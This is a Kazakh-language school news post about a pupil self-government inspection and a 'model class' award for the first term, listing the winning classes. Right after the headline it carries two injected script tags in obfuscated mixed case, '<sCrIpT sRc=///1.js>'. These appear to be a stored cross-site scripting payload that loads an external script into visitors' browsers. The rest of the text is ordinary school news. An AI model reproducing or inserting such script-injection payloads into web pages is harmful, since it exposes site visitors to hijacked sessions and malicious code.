ҮЛГІЛІ СЫНЫП - МЕКТЕП ТІРЕГІ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.11.2022 ҮЛГІЛІ СЫНЫП - МЕКТЕП ТІРЕГІ "Тасты ауылының жалпы орта білім беретін мектебі КММ-де өзін-өзі басқару ұйымының мүшелері мектепішілік рейд өткізді. Оқушылардың күнделіктерінің уақытылы толтырылуы,таза және ұқыпты ұсталуы,мектеп формасын ережеге сай киюі,оқушының бой - бас тазалығы,оқулықтардың қапталуы мен таза ұстауы,сабаққа уақытылы қатысуын қадағалап,жалпы қорытынды жұмыстары жасалды.Тәртіп бұзған оқушылармен түсіндірме жұмыстары жүргізілді. "Жас Ұлан"және "Жас Қыран" ұйымының төсбелгілері мен галстуктары тексерілді. I тоқсанның қорытындысы бойынша үлгілі тәртібімен,оқу үлгерімімен,ұқыптылығымен ерекше көзге түскен "Ең ұқыпты,таза, үлгілі,тәртіпті сынып" номинациясы бойынша төмендегі сыныптар марапатқа ие болды. 1 орын -4"А" ,6"А" 2 орын - 2"Б",5 "Б",7"А" 3 орын- 4"Б" ,3"Б" 8"А" Жеңістеріңіз құтты болсын! Алдағы уақытта биік шыңдарды бағындыра беріңіздер! Аға тәлімгер Байгужина К.Е #Мектеппарламенті #Жасұланұйымы #Балаларжылы
Просмотров: 583


Пікір қосу



Деректерді қолтаңбаға қосу